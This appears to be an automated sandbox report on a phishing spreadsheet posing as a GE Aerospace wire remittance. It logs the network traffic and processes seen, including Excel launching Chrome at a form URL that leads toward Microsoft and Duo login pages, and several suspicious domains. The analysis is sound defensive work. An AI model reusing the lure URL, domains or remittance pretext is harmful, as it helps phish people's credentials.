Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: form.questionscout.com
Source: global trafficDNS traffic detected: DNS query: d3djdih2k2vfi2.cloudfront.net
Source: global trafficDNS traffic detected: DNS query: formapi.questionscout.com
Source: global trafficDNS traffic detected: DNS query: geolocation-db.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: adi.actinkaeophl.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: yywinjs4bgrxgjy0hoc2skhhgd2kzofulsv3kqb6aqgdv3uks5i1bf5jrct.pafcoedru.com
Source: global trafficDNS traffic detected: DNS query: word.office.com
Source: global trafficDNS traffic detected: DNS query: www.microsoft365.com
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: sso-dbbfec7f.sso.duosecurity.com
Source: global trafficDNS traffic detected: DNS query: cisco.login.duosecurity.com
Source: global trafficDNS traffic detected: DNS query: ux-asset-commercial.duosecurity.com
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownNetwork traffic detected: HTTP traffic on port 63778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 63726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 63749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63692 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63703
Source: unknownNetwork traffic detected: HTTP traffic on port 63766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 63710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63693 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 63789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63687 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63717
Source: unknownNetwork traffic detected: HTTP traffic on port 63744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63718
Source: unknownNetwork traffic detected: HTTP traffic on port 63761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63710
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63690
Source: unknownNetwork traffic detected: HTTP traffic on port 63707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63692
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63691
Source: unknownNetwork traffic detected: HTTP traffic on port 63774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63683
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63682
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63685
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63684
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63687
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63686
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63689
Source: unknownNetwork traffic detected: HTTP traffic on port 63691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63688
Source: unknownNetwork traffic detected: HTTP traffic on port 63756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63685 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63694
Source: unknownNetwork traffic detected: HTTP traffic on port 63711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63693
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63696
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63695
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63697
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63699
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63686 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63684 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63769
Source: unknownNetwork traffic detected: HTTP traffic on port 63741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63760
Source: unknownNetwork traffic detected: HTTP traffic on port 63712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63761
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 63695 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63780
Source: unknownNetwork traffic detected: HTTP traffic on port 63735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63689 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63778
Source: unknownNetwork traffic detected: HTTP traffic on port 63770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63770
Source: unknownNetwork traffic detected: HTTP traffic on port 63746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63775
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63776
Source: unknownNetwork traffic detected: HTTP traffic on port 63705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63789
Source: unknownNetwork traffic detected: HTTP traffic on port 63718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63787
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63694 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63688 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63729
Source: unknownNetwork traffic detected: HTTP traffic on port 63760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63721
Source: unknownNetwork traffic detected: HTTP traffic on port 63704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63682 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63736
Source: unknownNetwork traffic detected: HTTP traffic on port 63719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63739
Source: unknownNetwork traffic detected: HTTP traffic on port 63742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63730
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63733
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63747
Source: unknownNetwork traffic detected: HTTP traffic on port 63714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63749
Source: unknownNetwork traffic detected: HTTP traffic on port 63737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63743
Source: unknownNetwork traffic detected: HTTP traffic on port 63754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63683 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63751
Source: unknownNetwork traffic detected: HTTP traffic on port 63748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63750
Source: unknownNetwork traffic detected: HTTP traffic on port 63782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63754
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:63717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.16:63761 version: TLS 1.2

System Summary

barindex
Source: GE AEROSPACE _WIRE REMITTANCE.xlsxInitial sample: Encrytped data at pos: 135996
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: password
Source: classification engineClassification label: mal56.phis.winXLSX@24/63@66/304
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$GE AEROSPACE _WIRE REMITTANCE.xlsx
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{BB84402F-8D5C-4AFF-BA66-B2899C205448} - OProcSessId.dat
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.ini
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\GE AEROSPACE _WIRE REMITTANCE.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://form.questionscout.com/672e80213f65b48c054fd942
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1808,i,12616564251290946413,13645178879606140381,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://form.questionscout.com/672e80213f65b48c054fd942
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1808,i,12616564251290946413,13645178879606140381,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a0c-f192-11d4-a65f-0040963251e5}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformation
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
3
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
